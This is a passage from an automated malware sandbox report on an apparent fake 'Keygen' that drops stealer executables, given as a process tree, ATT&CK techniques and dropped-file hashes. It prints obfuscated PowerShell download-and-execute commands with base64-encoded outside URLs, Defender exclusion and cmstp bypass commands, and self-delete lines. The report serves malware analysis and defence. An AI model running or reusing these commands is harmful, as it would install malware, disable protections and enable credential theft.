                        "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                        10⤵
                        • Executes dropped EXE
                        PID:3036
                  • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                    8⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Checks processor information in registry
                    PID:1276
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\System32\cmd.exe" /c taskkill /pid 1276 & erase C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe & RD /S /Q C:\\ProgramData\\276186238556309\\* & exit
                      9⤵
                        PID:1260
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /pid 1276
                          10⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1372
                • C:\Users\Public\ctx.exe
                  "C:\Users\Public\ctx.exe"
                  6⤵
                  • Executes dropped EXE
                  PID:1320
                • C:\Users\Public\ctx.exe
                  "C:\Users\Public\ctx.exe"
                  6⤵
                  • Executes dropped EXE
                  PID:2040
          • C:\Windows\SysWOW64\mshta.exe
            "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\F46D.tmp\b1.hta"
            3⤵
            • Modifies Internet Explorer settings
            • Suspicious use of WriteProcessMemory
            PID:564
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ftdrmoulpbhgsc $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ftdrmoulpbhgsc rfmngajuyepx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rfmngajuyepx;ftdrmoulpbhgsc hnjmzobgr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3Bkc2hjanZudi51Zy96eGN2Yi5leGU=';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);hnjmzobgr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
              4⤵
              • Loads dropped DLL
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1148
              • C:\Users\Public\hed.exe
                "C:\Users\Public\hed.exe"
                5⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of SetThreadContext
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of SetWindowsHookEx
                PID:2004
                • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                  "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                  6⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of SetThreadContext
                  • Suspicious behavior: MapViewOfSection
                  • Suspicious use of SetWindowsHookEx
                  PID:2452
                  • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                    "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                    7⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Checks processor information in registry
                    PID:2812
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\System32\cmd.exe" /c taskkill /pid 2812 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\529408444852450\\* & exit
                      8⤵
                        PID:2388
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /pid 2812
                          9⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:892
                  • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                    "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                    6⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of SetThreadContext
                    • Suspicious behavior: MapViewOfSection
                    • Suspicious use of SetWindowsHookEx
                    PID:2172
                    • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                      "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                      7⤵
                      • Executes dropped EXE
                      PID:2252
                  • C:\Users\Public\hed.exe
                    "C:\Users\Public\hed.exe"
                    6⤵
                    • Executes dropped EXE
                    PID:1624
            • C:\Windows\SysWOW64\timeout.exe
              timeout 2
              3⤵
              • Delays execution with timeout.exe
              PID:1364
            • C:\Windows\SysWOW64\mshta.exe
              "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\F46D.tmp\ba.hta"
              3⤵
              • Modifies Internet Explorer settings
              • Suspicious use of WriteProcessMemory
              PID:768
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vfudzcotabjeq $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vfudzcotabjeq urdjneqmx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|urdjneqmx;vfudzcotabjeq wuirkcyfmgjql $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKRA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);wuirkcyfmgjql $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                4⤵
                • Blocklisted process makes network request
                • Loads dropped DLL
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1320
                • C:\Users\Public\znl.exe
                  "C:\Users\Public\znl.exe"
                  5⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of SetThreadContext
                  • Suspicious behavior: MapViewOfSection
                  • Suspicious use of SetWindowsHookEx
                  PID:2684
                  • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                    "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                    6⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of SetThreadContext
                    • Suspicious behavior: MapViewOfSection
                    • Suspicious use of SetWindowsHookEx
                    PID:2756
                    • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                      "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                      7⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Checks processor information in registry
                      PID:2876
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\System32\cmd.exe" /c taskkill /pid 2876 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\510353419513517\\* & exit
                        8⤵
                          PID:2344
                          • C:\Windows\SysWOW64\taskkill.exe
                            taskkill /pid 2876
                            9⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:948
                    • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                      "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                      6⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Suspicious use of SetThreadContext
                      • Suspicious behavior: MapViewOfSection
                      • Suspicious use of SetWindowsHookEx
                      PID:2780
                      • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                        "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                        7⤵
                        • Executes dropped EXE
                        PID:1628
                    • C:\Users\Public\znl.exe
                      "C:\Users\Public\znl.exe"
                      6⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Drops desktop.ini file(s)
                      • Modifies system certificate store
                      PID:2856
                      • C:\Users\Admin\AppData\Local\Temp\2THXls2TXw.exe
                        "C:\Users\Admin\AppData\Local\Temp\2THXls2TXw.exe"
                        7⤵
                        • Executes dropped EXE
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2828
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
                          "Powershell" Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Local\Temp\2THXls2TXw.exe"'
                          8⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2820
                      • C:\Users\Admin\AppData\Local\Temp\aVyFaC6aVP.exe
                        "C:\Users\Admin\AppData\Local\Temp\aVyFaC6aVP.exe"
                        7⤵
                        • Executes dropped EXE
                        PID:1108
                        • C:\Windows\SysWOW64\Notepad.exe
                          "C:\Windows\System32\Notepad.exe"
                          8⤵
                            PID:2384
                        • C:\Users\Admin\AppData\Local\Temp\ZniKNUvv8Q.exe
                          "C:\Users\Admin\AppData\Local\Temp\ZniKNUvv8Q.exe"
                          7⤵
                          • Executes dropped EXE
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of SetWindowsHookEx
                          PID:3016
                          • \??\c:\windows\SysWOW64\cmstp.exe
                            "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\efxndbem.inf
                            8⤵
                              PID:2348
                          • C:\Users\Admin\AppData\Local\Temp\VywbKMWW27.exe
                            "C:\Users\Admin\AppData\Local\Temp\VywbKMWW27.exe"
                            7⤵
                            • Executes dropped EXE
                            • Windows security modification
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2708
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              "powershell" Get-MpPreference -verbose
                              8⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2880
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\znl.exe"
                            7⤵
                              PID:1064
                              • C:\Windows\SysWOW64\timeout.exe
                                timeout /T 10 /NOBREAK
                                8⤵
                                • Delays execution with timeout.exe
                                PID:1200
                    • C:\Windows\SysWOW64\mshta.exe
                      "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\F46D.tmp\ba1.hta"
                      3⤵
                      • Modifies Internet Explorer settings
                      • Suspicious use of WriteProcessMemory
                      PID:1280
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL wvroy $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;wvroy bwskyfgqtipu $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bwskyfgqtipu;wvroy shlevpgb $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3JiY3h2bmIudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);shlevpgb $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                        4⤵
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1896

                Network

                MITRE ATT&CK Matrix ATT&CK v6

                Persistence

                Modify Existing Service

                1
                T1031

                Defense Evasion

                Modify Registry

                4
                T1112

                Disabling Security Tools

                2
                T1089

                Install Root Certificate

                1
                T1130

                Credential Access

                Credentials in Files

                3
                T1081

                Discovery

                Query Registry

                2
                T1012

                System Information Discovery

                2
                T1082

                Collection

                Data from Local System

                3
                T1005

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • C:\ProgramData\MSVCP140.dll
                • C:\ProgramData\freebl3.dll
                • C:\ProgramData\freebl3.dll
                • C:\ProgramData\mozglue.dll
                • C:\ProgramData\mozglue.dll
                • C:\ProgramData\nss3.dll
                  MD5

                  bfac4e3c5908856ba17d41edcd455a51

                  SHA1

                  8eec7e888767aa9e4cca8ff246eb2aacb9170428

                  SHA256

                  e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                  SHA512

                  2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                • C:\ProgramData\softokn3.dll
                • C:\ProgramData\softokn3.dll
                • C:\ProgramData\softokn3.dll
                • C:\ProgramData\sqlite3.dll
                • C:\ProgramData\sqlite3.dll
                • C:\ProgramData\vcruntime140.dll
                • C:\ProgramData\vcruntime140.dll
                • C:\ProgramData\vcruntime140.dll
                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_116215dc-8791-4e8d-87d2-e7cbc91f8a8e
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1a1733a9-c78a-41f9-ba49-7e78bc3e775b
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_20c2fb06-3d37-4b2f-b3dc-306d5a872e0c
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_478c05f3-b801-4912-91bd-47646e127596
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4fd4a7fe-82f5-41e4-888c-1b7eac83ece7
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a2ebb337-3027-47ef-8098-8d2e9f7615cf
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ca37ad88-4ce8-48e7-a2ed-ec10658dba29
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_dca637e1-27f7-4217-bb90-64badfb8de9d
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e10aa6dc-f3ff-45e4-9eec-4fef42847693
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e1dd9aab-0fd1-4532-ba7f-00569c2741ef
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ead566ff-c093-48cb-9094-d57b4571edca
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                • C:\Users\Admin\AppData\Local\Temp\2THXls2TXw.exe
                • C:\Users\Admin\AppData\Local\Temp\2THXls2TXw.exe
                • C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs
                • C:\Users\Admin\AppData\Local\Temp\F46D.tmp\Keygen.exe
                • C:\Users\Admin\AppData\Local\Temp\F46D.tmp\Keygen.exe
                • C:\Users\Admin\AppData\Local\Temp\F46D.tmp\b.hta
                • C:\Users\Admin\AppData\Local\Temp\F46D.tmp\b1.hta
                • C:\Users\Admin\AppData\Local\Temp\F46D.tmp\ba.hta
                • C:\Users\Admin\AppData\Local\Temp\F46D.tmp\ba1.hta
                • C:\Users\Admin\AppData\Local\Temp\F46D.tmp\m.hta
                • C:\Users\Admin\AppData\Local\Temp\F46D.tmp\m1.hta
                • C:\Users\Admin\AppData\Local\Temp\F46D.tmp\start.bat
                • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                • C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs
                • C:\Users\Admin\AppData\Local\Temp\VywbKMWW27.exe
                • C:\Users\Admin\AppData\Local\Temp\VywbKMWW27.exe
                • C:\Users\Admin\AppData\Local\Temp\ZniKNUvv8Q.exe
                • C:\Users\Admin\AppData\Local\Temp\ZniKNUvv8Q.exe
                • C:\Users\Admin\AppData\Local\Temp\aVyFaC6aVP.exe
                  MD5

                  013db621a3351e3fb049efd2ccad79ff

                  SHA1

                  a23394ea54dbc5342a77938a2c285ee616185560

                  SHA256

                  df1bda6183201e4dc1bc6f6425361a565413e71f09da0648b0c82b39786af27a

                  SHA512

                  1bf6d076677b234c9da7cbc720fc64632b587b4223b5370a7ca3d53c4d59fa59ef117957b1646c92ba80dac332f6c1c313060d35de7236b2585e5bed00d79229

                • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                • C:\Users\Public\ctx.exe
                • C:\Users\Public\ctx.exe
                • C:\Users\Public\ctx.exe
                • C:\Users\Public\ctx.exe
                • C:\Users\Public\hed.exe
                • C:\Users\Public\hed.exe
                • C:\Users\Public\hed.exe
                • C:\Users\Public\hed.exe
                • C:\Users\Public\hed.exe
                • C:\Users\Public\znl.exe
                • C:\Users\Public\znl.exe
                • C:\Users\Public\znl.exe
                • C:\Windows\temp\efxndbem.inf
                • \??\PIPE\srvsvc
                • \ProgramData\mozglue.dll
                • \ProgramData\mozglue.dll
                • \ProgramData\mozglue.dll
                • \ProgramData\msvcp140.dll
                • \ProgramData\msvcp140.dll
                • \ProgramData\msvcp140.dll
                • \ProgramData\nss3.dll
                  MD5

                  bfac4e3c5908856ba17d41edcd455a51

                  SHA1

                  8eec7e888767aa9e4cca8ff246eb2aacb9170428

                  SHA256

                  e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                  SHA512

                  2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                • \ProgramData\nss3.dll
                  MD5

                  bfac4e3c5908856ba17d41edcd455a51

                  SHA1

                  8eec7e888767aa9e4cca8ff246eb2aacb9170428

                  SHA256

                  e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                  SHA512

                  2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                • \ProgramData\nss3.dll
                  MD5

                  bfac4e3c5908856ba17d41edcd455a51

                  SHA1

                  8eec7e888767aa9e4cca8ff246eb2aacb9170428

                  SHA256

                  e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                  SHA512

                  2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                • \ProgramData\nss3.dll
                  MD5

                  bfac4e3c5908856ba17d41edcd455a51

                  SHA1

                  8eec7e888767aa9e4cca8ff246eb2aacb9170428

                  SHA256

                  e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                  SHA512

                  2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                • \ProgramData\sqlite3.dll
                • \ProgramData\sqlite3.dll
                • \ProgramData\sqlite3.dll
                • \ProgramData\sqlite3.dll
                • \ProgramData\vcruntime140.dll
                • \ProgramData\vcruntime140.dll
                • \ProgramData\vcruntime140.dll
                • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
                • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
                • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\mozglue.dll
                • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\msvcp140.dll
                • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\nss3.dll
                  MD5

                  02cc7b8ee30056d5912de54f1bdfc219

                  SHA1

                  a6923da95705fb81e368ae48f93d28522ef552fb

                  SHA256

                  1989526553fd1e1e49b0fea8036822ca062d3d39c4cab4a37846173d0f1753d5

                  SHA512

                  0d5dfcf4fb19b27246fa799e339d67cd1b494427783f379267fb2d10d615ffb734711bab2c515062c078f990a44a36f2d15859b1dacd4143dcc35b5c0cee0ef5

                • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\softokn3.dll
                • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\vcruntime140.dll
                • \Users\Admin\AppData\LocalLow\sqlite3.dll
                • \Users\Admin\AppData\Local\Temp\2THXls2TXw.exe
                • \Users\Admin\AppData\Local\Temp\F46D.tmp\Keygen.exe
                • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                • \Users\Admin\AppData\Local\Temp\VywbKMWW27.exe
                • \Users\Admin\AppData\Local\Temp\ZniKNUvv8Q.exe
                • \Users\Admin\AppData\Local\Temp\aVyFaC6aVP.exe
                  MD5

                  013db621a3351e3fb049efd2ccad79ff

                  SHA1

                  a23394ea54dbc5342a77938a2c285ee616185560

                  SHA256

